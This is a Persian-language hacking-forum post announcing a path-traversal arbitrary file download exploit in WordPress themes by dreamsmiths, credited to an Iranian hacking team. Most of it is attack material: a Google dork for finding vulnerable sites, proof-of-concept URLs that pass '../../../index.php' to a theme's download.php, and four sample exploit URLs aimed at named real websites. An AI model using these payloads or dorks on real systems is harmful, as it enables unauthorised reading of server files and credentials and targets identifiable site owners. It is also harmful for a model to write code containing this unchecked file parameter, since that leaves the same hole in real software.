Wordpress dreamsmiths Themes Arbitrary File Download

SafeMaster

مدیر

تاریخ عضویت: Apr 2017

نوشته: 1344
- اشتراک
- توییت
#1

Wordpress dreamsmiths Themes Arbitrary File Download

08-17-2018, 03:49 PM

سلام دوستان این آسیب پذیری به نام تیم ثبت شد .

[php]

# Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/
inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7 , KAli

P0c:

Arbitrary Download PHP File in all WordPress themes By dreamsmiths :
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php

Sample:

https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php

[/php]

https://packetstormsecurity.com/file...-Download.html

ویرایش توسط SafeMaster : https://www.iranhack.com/forum/member/3631-safemaster در ساعت 08-18-2018, 10:02 AM

-----------------------------SAFE MASTER---------------------------
تاپیک هکر های تازه وارد
برچسب ها: هیچ یک

اطلاعیه

Wordpress dreamsmiths Themes Arbitrary File Download

Wordpress dreamsmiths Themes Arbitrary File Download